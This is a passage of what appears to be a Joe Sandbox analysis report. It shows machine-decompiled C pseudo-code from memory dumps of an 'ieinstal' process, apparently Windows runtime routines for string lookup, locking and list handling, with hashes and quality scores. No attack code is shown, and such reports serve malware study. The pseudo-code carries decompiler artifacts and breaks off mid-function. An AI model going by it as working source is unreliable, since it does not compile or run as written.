                        				short _t56;
                        				signed int _t57;
                        				intOrPtr _t58;
                        				signed short* _t61;
                        				intOrPtr _t72;
                        				intOrPtr _t75;
                        				intOrPtr _t84;
                        				intOrPtr _t87;
                        				intOrPtr* _t90;
                        				signed short* _t91;
                        				signed int _t95;
                        				signed short* _t96;
                        				intOrPtr _t97;
                        				intOrPtr _t102;
                        				signed int _t108;
                        				intOrPtr _t110;
                        				signed int _t111;
                        				signed short* _t112;
                        				void* _t113;
                        				signed int _t116;
                        				signed short** _t119;
                        				short* _t120;
                        				signed int _t123;
                        				signed int _t124;
                        				void* _t125;
                        				intOrPtr _t127;
                        				signed int _t128;
                        
                        				_t90 = __ecx;
                        				_v16 = __edx;
                        				_t108 = _a4;
                        				_v28 = __ecx;
                        				_t4 = _t108 - 1; // -1
                        				if(_t4 > 0x13) {
                        					L15:
                        					_t56 = 0xc0000100;
                        					L16:
                        					return _t56;
                        				}
                        				_t57 = _t108 * 0x1c;
                        				_v32 = _t57;
                        				_t6 = _t57 + 0x1edf8204; // 0x0
                        				_t123 =  *_t6;
                        				_t7 = _t57 + 0x1edf8208; // 0x1edf8207
                        				_t8 = _t57 + 0x1edf8208; // 0x1edf8207
                        				_t119 = _t8;
                        				_v36 = _t123;
                        				_t110 = _t7 + _t123 * 8;
                        				_v24 = _t110;
                        				_t111 = _a4;
                        				if(_t119 >= _t110) {
                        					L12:
                        					if(_t123 != 3) {
                        						_t58 =  *0x1edf8450; // 0x3003630
                        						if(_t58 == 0) {
                        							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
                        						}
                        					} else {
                        						_t26 = _t57 + 0x1edf821c; // 0x0
                        						_t58 =  *_t26;
                        					}
                        					 *_t90 = _t58;
                        					goto L15;
                        				} else {
                        					goto L2;
                        				}
                        				while(1) {
                        					_t116 =  *_t61 & 0x0000ffff;
                        					_t128 =  *(_t127 + _t61) & 0x0000ffff;
                        					if(_t116 == _t128) {
                        						goto L18;
                        					}
                        					L5:
                        					if(_t116 >= 0x61) {
                        						if(_t116 > 0x7a) {
                        							_t97 =  *0x1edf6d5c; // 0x7fe20654
                        							_t72 =  *0x1edf6d5c; // 0x7fe20654
                        							_t75 =  *0x1edf6d5c; // 0x7fe20654
                        							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
                        						} else {
                        							_t116 = _t116 - 0x20;
                        						}
                        					}
                        					if(_t128 >= 0x61) {
                        						if(_t128 > 0x7a) {
                        							_t102 =  *0x1edf6d5c; // 0x7fe20654
                        							_t84 =  *0x1edf6d5c; // 0x7fe20654
                        							_t87 =  *0x1edf6d5c; // 0x7fe20654
                        							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
                        						} else {
                        							_t128 = _t128 - 0x20;
                        						}
                        					}
                        					if(_t116 == _t128) {
                        						_t61 = _v12;
                        						_t96 = _v8;
                        					} else {
                        						_t113 = _t116 - _t128;
                        						L9:
                        						_t111 = _a4;
                        						if(_t113 == 0) {
                        							_t115 =  &(( *_t119)[_t111 + 1]);
                        							_t33 =  &(_t119[1]); // 0x100
                        							_t120 = _a8;
                        							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
                        							_t35 = _t95 - 1; // 0xff
                        							_t124 = _t35;
                        							if(_t120 == 0) {
                        								L27:
                        								 *_a16 = _t95;
                        								_t56 = 0xc0000023;
                        								goto L16;
                        							}
                        							if(_t124 >= _a12) {
                        								if(_a12 >= 1) {
                        									 *_t120 = 0;
                        								}
                        								goto L27;
                        							}
                        							 *_a16 = _t124;
                        							_t125 = _t124 + _t124;
                        							E1ED4F3E0(_t120, _t115, _t125);
                        							_t56 = 0;
                        							 *((short*)(_t125 + _t120)) = 0;
                        							goto L16;
                        						}
                        						_t119 =  &(_t119[2]);
                        						if(_t119 < _v24) {
                        							L2:
                        							_t91 =  *_t119;
                        							_t61 = _t91;
                        							_v12 = _t61;
                        							_t112 =  &(_t61[_t111]);
                        							_v8 = _t112;
                        							if(_t61 >= _t112) {
                        								break;
                        							} else {
                        								_t127 = _v16 - _t91;
                        								_t96 = _t112;
                        								_v20 = _t127;
                        								_t116 =  *_t61 & 0x0000ffff;
                        								_t128 =  *(_t127 + _t61) & 0x0000ffff;
                        								if(_t116 == _t128) {
                        									goto L18;
                        								}
                        								goto L5;
                        							}
                        						} else {
                        							_t90 = _v28;
                        							_t57 = _v32;
                        							_t123 = _v36;
                        							goto L12;
                        						}
                        					}
                        					L18:
                        					_t61 =  &(_t61[1]);
                        					_v12 = _t61;
                        					if(_t61 >= _t96) {
                        						break;
                        					}
                        					_t127 = _v20;
                        				}
                        				_t113 = 0;
                        				goto L9;
                        			}


                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7a4872846d1d2060b33bba760f206dec1060272f267b978eb4ad6b1633812267
                        • Instruction ID: 237bd41c924f10b32f34bf5604a7a215ff248d5348ba0e91dacea2498a635552
                        • Opcode Fuzzy Hash: 7a4872846d1d2060b33bba760f206dec1060272f267b978eb4ad6b1633812267
                        • Instruction Fuzzy Hash: E051B3B6E00125CFCB14CF1DC8909ADB7B5FF88B01725865AE896AB318D770AE51CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 86%
                        			E1EDCAE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
                        				signed int _v8;
                        				signed int _v12;
                        				void* __esi;
                        				void* __ebp;
                        				signed short* _t36;
                        				signed int _t41;
                        				char* _t42;
                        				intOrPtr _t43;
                        				signed int _t47;
                        				void* _t52;
                        				signed int _t57;
                        				intOrPtr _t61;
                        				signed char _t62;
                        				signed int _t72;
                        				signed char _t85;
                        				signed int _t88;
                        
                        				_t73 = __edx;
                        				_push(__ecx);
                        				_t85 = __ecx;
                        				_v8 = __edx;
                        				_t61 =  *((intOrPtr*)(__ecx + 0x28));
                        				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
                        				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
                        					_t57 = _t57 | 0x00000001;
                        				}
                        				_t88 = 0;
                        				_t36 = 0;
                        				_t96 = _a12;
                        				if(_a12 == 0) {
                        					_t62 = _a8;
                        					__eflags = _t62;
                        					if(__eflags == 0) {
                        						goto L12;
                        					}
                        					_t52 = E1EDCC38B(_t85, _t73, _t57, 0);
                        					_t62 = _a8;
                        					 *_t62 = _t52;
                        					_t36 = 0;
                        					goto L11;
                        				} else {
                        					_t36 = E1EDCACFD(_t85, _t73, _t96, _t57, _a8);
                        					if(0 == 0 || 0 == 0xffffffff) {
                        						_t72 = _t88;
                        					} else {
                        						_t72 =  *0x00000000 & 0x0000ffff;
                        					}
                        					 *_a12 = _t72;
                        					_t62 = _a8;
                        					L11:
                        					_t73 = _v8;
                        					L12:
                        					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
                        						L19:
                        						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
                        							L22:
                        							_t74 = _v8;
                        							__eflags = _v8;
                        							if(__eflags != 0) {
                        								L25:
                        								__eflags = _t88 - 2;
                        								if(_t88 != 2) {
                        									__eflags = _t85 + 0x44 + (_t88 << 6);
                        									_t88 = E1EDCFDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
                        									goto L34;
                        								}
                        								L26:
                        								_t59 = _v8;
                        								E1EDCEA55(_t85, _v8, _t57);
                        								asm("sbb esi, esi");
                        								_t88 =  ~_t88;
                        								_t41 = E1ED27D50();
                        								__eflags = _t41;
                        								if(_t41 == 0) {
                        									_t42 = 0x7ffe0380;
                        								} else {
                        									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        								}
                        								__eflags =  *_t42;
                        								if( *_t42 != 0) {
                        									_t43 =  *[fs:0x30];
                        									__eflags =  *(_t43 + 0x240) & 0x00000001;
                        									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
                        										__eflags = _t88;
                        										if(_t88 != 0) {
                        											E1EDC1608(_t85, _t59, 3);
                        										}
                        									}
                        								}
                        								goto L34;
                        							}
                        							_push(_t62);
                        							_t47 = E1EDD1536(0x1edf8ae4, (_t74 -  *0x1edf8b04 >> 0x14) + (_t74 -  *0x1edf8b04 >> 0x14), _t88, __eflags);
                        							__eflags = _t47;
                        							if(_t47 == 0) {
                        								goto L26;
                        							}
                        							_t74 = _v12;
                        							_t27 = _t47 - 1; // -1
                        							_t88 = _t27;
                        							goto L25;
                        						}
                        						_t62 = _t85;
                        						if(L1EDCC323(_t62, _v8, _t57) != 0xffffffff) {
                        							goto L22;
                        						}
                        						_push(_t62);
                        						_push(_t88);
                        						E1EDCA80D(_t85, 9, _v8, _t88);
                        						goto L34;
                        					} else {
                        						_t101 = _t36;
                        						if(_t36 != 0) {
                        							L16:
                        							if(_t36 == 0xffffffff) {
                        								goto L19;
                        							}
                        							_t62 =  *((intOrPtr*)(_t36 + 2));
                        							if((_t62 & 0x0000000f) == 0) {
                        								goto L19;
                        							}
                        							_t62 = _t62 & 0xf;
                        							if(E1EDACB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
                        								L34:
                        								return _t88;
                        							}
                        							goto L19;
                        						}
                        						_t62 = _t85;
                        						_t36 = E1EDCACFD(_t62, _t73, _t101, _t57, _t62);
                        						if(_t36 == 0) {
                        							goto L19;
                        						}
                        						goto L16;
                        					}
                        				}
                        			}



                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 24b556e469c4852631edfeff9458afa2ae026a8e6d43d044fbf6cb2acfb684b1
                        • Instruction ID: ad39505f7280eb4a2b80e7f808aa4af83c9c1a2d383d7877a5c8c0417a5a595d
                        • Opcode Fuzzy Hash: 24b556e469c4852631edfeff9458afa2ae026a8e6d43d044fbf6cb2acfb684b1
                        • Instruction Fuzzy Hash: B941C7B1B006519BD716CB25C8A4B6FB79AEF886A0F01471DF857C72D0DB74E842C7A2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 86%
                        			E1ED2DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
                        				char _v5;
                        				signed int _v12;
                        				signed int* _v16;
                        				intOrPtr _v20;
                        				intOrPtr _v24;
                        				intOrPtr _v28;
                        				intOrPtr _v32;
                        				intOrPtr _v36;
                        				intOrPtr _v40;
                        				intOrPtr _v44;
                        				void* __ebx;
                        				void* __edi;
                        				signed int _t54;
                        				char* _t58;
                        				signed int _t66;
                        				intOrPtr _t67;
                        				intOrPtr _t68;
                        				intOrPtr _t72;
                        				intOrPtr _t73;
                        				signed int* _t75;
                        				intOrPtr _t79;
                        				intOrPtr _t80;
                        				char _t82;
                        				signed int _t83;
                        				signed int _t84;
                        				signed int _t88;
                        				signed int _t89;
                        				intOrPtr _t90;
                        				intOrPtr _t92;
                        				signed int _t97;
                        				intOrPtr _t98;
                        				intOrPtr* _t99;
                        				signed int* _t101;
                        				signed int* _t102;
                        				intOrPtr* _t103;
                        				intOrPtr _t105;
                        				signed int _t106;
                        				void* _t118;
                        
                        				_t92 = __edx;
                        				_t75 = _a4;
                        				_t98 = __ecx;
                        				_v44 = __edx;
                        				_t106 = _t75[1];
                        				_v40 = __ecx;
                        				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
                        					_t82 = 0;
                        				} else {
                        					_t82 = 1;
                        				}
                        				_v5 = _t82;
                        				_t6 = _t98 + 0xc8; // 0xc9
                        				_t101 = _t6;
                        				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
                        				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
                        				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
                        				if(_t82 != 0) {
                        					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
                        					_t83 =  *_t75;
                        					_t54 = _t75[1];
                        					 *_t101 = _t83;
                        					_t84 = _t83 | _t54;
                        					_t101[1] = _t54;
                        					if(_t84 == 0) {
                        						_t101[1] = _t101[1] & _t84;
                        						 *_t101 = 1;
                        					}
                        					goto L19;
                        				} else {
                        					if(_t101 == 0) {
                        						E1ED0CC50(E1ED04510(0xc000000d));
                        						_t88 =  *_t101;
                        						_t97 = _t101[1];
                        						L15:
                        						_v12 = _t88;
                        						_t66 = _t88 -  *_t75;
                        						_t89 = _t97;
                        						asm("sbb ecx, [ebx+0x4]");
                        						_t118 = _t89 - _t97;
                        						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
                        							_t66 = _t66 | 0xffffffff;
                        							_t89 = 0x7fffffff;
                        						}
                        						 *_t101 = _t66;
                        						_t101[1] = _t89;
                        						L19:
                        						if(E1ED27D50() != 0) {
                        							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        						} else {
                        							_t58 = 0x7ffe0386;
                        						}
                        						_t102 = _v16;
                        						if( *_t58 != 0) {
                        							_t58 = E1EDD8ED6(_t102, _t98);
                        						}
                        						_t76 = _v44;
                        						E1ED22280(_t58, _v44);
                        						E1ED2DD82(_v44, _t102, _t98);
                        						E1ED2B944(_t102, _v5);
                        						return E1ED1FFB0(_t76, _t98, _t76);
                        					}
                        					_t99 = 0x7ffe03b0;
                        					do {
                        						_t103 = 0x7ffe0010;
                        						do {
                        							_t67 =  *0x1edf8628; // 0x0
                        							_v28 = _t67;
                        							_t68 =  *0x1edf862c; // 0x0
                        							_v32 = _t68;
                        							_v24 =  *((intOrPtr*)(_t99 + 4));
                        							_v20 =  *_t99;
                        							while(1) {
                        								_t97 =  *0x7ffe000c;
                        								_t90 =  *0x7FFE0008;
                        								if(_t97 ==  *_t103) {
                        									goto L10;
                        								}
                        								asm("pause");
                        							}
                        							L10:
                        							_t79 = _v24;
                        							_t99 = 0x7ffe03b0;
                        							_v12 =  *0x7ffe03b0;
                        							_t72 =  *0x7FFE03B4;
                        							_t103 = 0x7ffe0010;
                        							_v36 = _t72;
                        						} while (_v20 != _v12 || _t79 != _t72);
                        						_t73 =  *0x1edf8628; // 0x0
                        						_t105 = _v28;
                        						_t80 =  *0x1edf862c; // 0x0
                        					} while (_t105 != _t73 || _v32 != _t80);
                        					_t98 = _v40;
                        					asm("sbb edx, [ebp-0x20]");
                        					_t88 = _t90 - _v12 - _t105;
                        					_t75 = _a4;
                        					asm("sbb edx, eax");
                        					_t31 = _t98 + 0xc8; // 0x1edcfb53
                        					_t101 = _t31;
                        					 *_t101 = _t88;
                        					_t101[1] = _t97;
                        					goto L15;
                        				}
                        			}



                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f36729a71c4e913fe9eeb8c13669743390541e09b2e986afd20ce17eef6c9c1e
                        • Instruction ID: 5d314daf8b9fc18ce8c3fb19a6c5251c675693a4d02eb927e6fb17a9ef9725c8
                        • Opcode Fuzzy Hash: f36729a71c4e913fe9eeb8c13669743390541e09b2e986afd20ce17eef6c9c1e
                        • Instruction Fuzzy Hash: DB51BE75A00656CFCB04CF68C490A8EFBF2BF48314F24866AD995A7344DB71E945CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 96%
                        			E1ED1EF40(intOrPtr __ecx) {
                        				char _v5;
                        				char _v6;
                        				char _v7;
                        				char _v8;
                        				signed int _v12;
                        				intOrPtr _v16;
                        				intOrPtr _v20;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				intOrPtr _t58;
                        				char _t59;
                        				signed char _t69;
                        				void* _t73;
                        				signed int _t74;
                        				char _t79;
                        				signed char _t81;
                        				signed int _t85;
                        				signed int _t87;
                        				intOrPtr _t90;
                        				signed char* _t91;
                        				void* _t92;
                        				signed int _t94;
                        				void* _t96;
                        
                        				_t90 = __ecx;
                        				_v16 = __ecx;
                        				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
                        					_t58 =  *((intOrPtr*)(__ecx));
                        					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
                        						E1ED09080(_t73, __ecx, __ecx, _t92);
                        					}
                        				}
                        				_t74 = 0;
                        				_t96 =  *0x7ffe036a - 1;
                        				_v12 = 0;
                        				_v7 = 0;
                        				if(_t96 > 0) {
                        					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
                        					_v12 = _t74;
                        					_v7 = _t96 != 0;
                        				}
                        				_t79 = 0;
                        				_v8 = 0;
                        				_v5 = 0;
                        				while(1) {
                        					L4:
                        					_t59 = 1;
                        					L5:
                        					while(1) {
                        						if(_t59 == 0) {
                        							L12:
                        							_t21 = _t90 + 4; // 0x77dfc21e
                        							_t87 =  *_t21;
                        							_v6 = 0;
                        							if(_t79 != 0) {
                        								if((_t87 & 0x00000002) != 0) {
                        									goto L19;
                        								}
                        								if((_t87 & 0x00000001) != 0) {
                        									_v6 = 1;
                        									_t74 = _t87 ^ 0x00000003;
                        								} else {
                        									_t51 = _t87 - 2; // -2
                        									_t74 = _t51;
                        								}
                        								goto L15;
                        							} else {
                        								if((_t87 & 0x00000001) != 0) {
                        									_v6 = 1;
                        									_t74 = _t87 ^ 0x00000001;
                        								} else {
                        									_t26 = _t87 - 4; // -4
                        									_t74 = _t26;
                        									if((_t74 & 0x00000002) == 0) {
                        										_t74 = _t74 - 2;
                        									}
                        								}
                        								L15:
                        								if(_t74 == _t87) {
                        									L19:
                        									E1ED02D8A(_t74, _t90, _t87, _t90);
                        									_t74 = _v12;
                        									_v8 = 1;
                        									if(_v7 != 0 && _t74 > 0x64) {
                        										_t74 = _t74 - 1;
                        										_v12 = _t74;
                        									}
                        									_t79 = _v5;
                        									goto L4;
                        								}
                        								asm("lock cmpxchg [esi], ecx");
                        								if(_t87 != _t87) {
                        									_t74 = _v12;
                        									_t59 = 0;
                        									_t79 = _v5;
                        									continue;
                        								}
                        								if(_v6 != 0) {
                        									_t74 = _v12;
                        									L25:
                        									if(_v7 != 0) {
                        										if(_t74 < 0x7d0) {
                        											if(_v8 == 0) {
                        												_t74 = _t74 + 1;
                        											}
                        										}
                        										_t38 = _t90 + 0x14; // 0x0
                        										_t39 = _t90 + 0x14; // 0x0
                        										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
                        										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                        											_t85 = _t85 & 0xff000000;
                        										}
                        										 *(_t90 + 0x14) = _t85;
                        									}
                        									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                        									 *((intOrPtr*)(_t90 + 8)) = 1;
                        									return 0;
                        								}
                        								_v5 = 1;
                        								_t87 = _t74;
                        								goto L19;
                        							}
                        						}
                        						_t94 = _t74;
                        						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
                        						if(_t74 == 0) {
                        							goto L12;
                        						} else {
                        							_t91 = _t90 + 4;
                        							goto L8;
                        							L9:
                        							while((_t81 & 0x00000001) != 0) {
                        								_t69 = _t81;
                        								asm("lock cmpxchg [edi], edx");
                        								if(_t69 != _t81) {
                        									_t81 = _t69;
                        									continue;
                        								}
                        								_t90 = _v16;
                        								goto L25;
                        							}
                        							asm("pause");
                        							_t94 = _t94 - 1;
                        							if(_t94 != 0) {
                        								L8:
                        								_t81 =  *_t91;
                        								goto L9;
                        							} else {
                        								_t90 = _v16;
                        								_t79 = _v5;
                        								goto L12;
                        							}
                        						}
                        					}
                        				}
                        			}

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                        • Instruction ID: 0d4543471f87c59e8e2bd5b2fde813d010e22c08657c908649ff28122b1945cb
                        • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                        • Instruction Fuzzy Hash: 5851C230E1428ADFDB00CB69E190B9EBBB2AF55314F1483ADE9855B281C375E9C9C791
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 84%
                        			E1EDD740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
                        				signed short* _v8;
                        				intOrPtr _v12;
                        				intOrPtr _t55;
                        				void* _t56;
                        				intOrPtr* _t66;
                        				intOrPtr* _t69;
                        				void* _t74;
                        				intOrPtr* _t78;
                        				intOrPtr* _t81;
                        				intOrPtr* _t82;
                        				intOrPtr _t83;
                        				signed short* _t84;
                        				intOrPtr _t85;
                        				signed int _t87;
                        				intOrPtr* _t90;
                        				intOrPtr* _t93;
                        				intOrPtr* _t94;
                        				void* _t98;
                        
                        				_t84 = __edx;
                        				_t80 = __ecx;
                        				_push(__ecx);
                        				_push(__ecx);
                        				_t55 = __ecx;
                        				_v8 = __edx;
                        				_t87 =  *__edx & 0x0000ffff;
                        				_v12 = __ecx;
                        				_t3 = _t55 + 0x154; // 0x154
                        				_t93 = _t3;
                        				_t78 =  *_t93;
                        				_t4 = _t87 + 2; // 0x2
                        				_t56 = _t4;
                        				while(_t78 != _t93) {
                        					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
                        						L4:
                        						_t78 =  *_t78;
                        						continue;
                        					} else {
                        						_t7 = _t78 + 0x18; // 0x18
                        						if(E1ED5D4F0(_t7, _t84[2], _t87) == _t87) {
                        							_t40 = _t78 + 0xc; // 0xc
                        							_t94 = _t40;
                        							_t90 =  *_t94;
                        							while(_t90 != _t94) {
                        								_t41 = _t90 + 8; // 0x8
                        								_t74 = E1ED4F380(_a4, _t41, 0x10);
                        								_t98 = _t98 + 0xc;
                        								if(_t74 != 0) {
                        									_t90 =  *_t90;
                        									continue;
                        								}
                        								goto L12;
                        							}
                        							_t82 = L1ED24620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                        							if(_t82 != 0) {
                        								_t46 = _t78 + 0xc; // 0xc
                        								_t69 = _t46;
                        								asm("movsd");
                        								asm("movsd");
                        								asm("movsd");
                        								asm("movsd");
                        								_t85 =  *_t69;
                        								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                        									L20:
                        									_t82 = 3;
                        									asm("int 0x29");
                        								}
                        								 *((intOrPtr*)(_t82 + 4)) = _t69;
                        								 *_t82 = _t85;
                        								 *((intOrPtr*)(_t85 + 4)) = _t82;
                        								 *_t69 = _t82;
                        								 *(_t78 + 8) =  *(_t78 + 8) + 1;
                        								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
                        								goto L11;
                        							} else {
                        								L18:
                        								_push(0xe);
                        								_pop(0);
                        							}
                        						} else {
                        							_t84 = _v8;
                        							_t9 = _t87 + 2; // 0x2
                        							_t56 = _t9;
                        							goto L4;
                        						}
                        					}
                        					L12:
                        					return 0;
                        				}
                        				_t10 = _t87 + 0x1a; // 0x1a
                        				_t78 = L1ED24620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
                        				if(_t78 == 0) {
                        					goto L18;
                        				} else {
                        					_t12 = _t87 + 2; // 0x2
                        					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
                        					_t16 = _t78 + 0x18; // 0x18
                        					E1ED4F3E0(_t16, _v8[2], _t87);
                        					 *((short*)(_t78 + _t87 + 0x18)) = 0;
                        					_t19 = _t78 + 0xc; // 0xc
                        					_t66 = _t19;
                        					 *((intOrPtr*)(_t66 + 4)) = _t66;
                        					 *_t66 = _t66;
                        					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
                        					_t81 = L1ED24620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                        					if(_t81 == 0) {
                        						goto L18;
                        					} else {
                        						_t26 = _t78 + 0xc; // 0xc
                        						_t69 = _t26;
                        						asm("movsd");
                        						asm("movsd");
                        						asm("movsd");
                        						asm("movsd");
                        						_t85 =  *_t69;
                        						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                        							goto L20;
                        						} else {
                        							 *((intOrPtr*)(_t81 + 4)) = _t69;
                        							 *_t81 = _t85;
                        							 *((intOrPtr*)(_t85 + 4)) = _t81;
                        							 *_t69 = _t81;
                        							_t83 = _v12;
                        							 *(_t78 + 8) = 1;
                        							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                        							_t34 = _t83 + 0x154; // 0x1ba
                        							_t69 = _t34;
                        							_t85 =  *_t69;
                        							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                        								goto L20;
                        							} else {
                        								 *_t78 = _t85;
                        								 *((intOrPtr*)(_t78 + 4)) = _t69;
                        								 *((intOrPtr*)(_t85 + 4)) = _t78;
                        								 *_t69 = _t78;
                        								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                        							}
                        						}
                        						goto L11;
                        					}
                        				}
                        				goto L12;
                        			}

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                        • Instruction ID: 2a767ba80dc0718fbb3b1cca1cdafbdb457b363ada3c7a5eb6446308154e2052
                        • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                        • Instruction Fuzzy Hash: E5517071600686DFCB16CF54C480A86BBB5FF45305F16C6FAE9089F295E371E949CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 97%
                        			E1ED32990() {
                        				signed int* _t62;
                        				signed int _t64;
                        				intOrPtr _t66;
                        				signed short* _t69;
                        				intOrPtr _t76;
                        				signed short* _t79;
                        				void* _t81;
                        				signed int _t82;
                        				signed short* _t83;
                        				signed int _t87;
                        				intOrPtr _t91;
                        				void* _t98;
                        				signed int _t99;
                        				void* _t101;
                        				signed int* _t102;
                        				void* _t103;
                        				void* _t104;
                        				void* _t107;
                        
                        				_push(0x20);
                        				_push(0x1eddff00);
                        				E1ED5D08C(_t81, _t98, _t101);
                        				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
                        				_t99 = 0;
                        				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
                        				_t82 =  *((intOrPtr*)(_t103 + 0x10));
                        				if(_t82 == 0) {
                        					_t62 = 0xc0000100;
                        				} else {
                        					 *((intOrPtr*)(_t103 - 4)) = 0;
                        					_t102 = 0xc0000100;
                        					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
                        					_t64 = 4;
                        					while(1) {
                        						 *(_t103 - 0x24) = _t64;
                        						if(_t64 == 0) {
                        							break;
                        						}
                        						_t87 = _t64 * 0xc;
                        						 *(_t103 - 0x2c) = _t87;
                        						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x1ece1664));
                        						if(_t107 <= 0) {
                        							if(_t107 == 0) {
                        								_t79 = E1ED4E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x1ece1668)), _t82);
                        								_t104 = _t104 + 0xc;
                        								__eflags = _t79;
                        								if(__eflags == 0) {
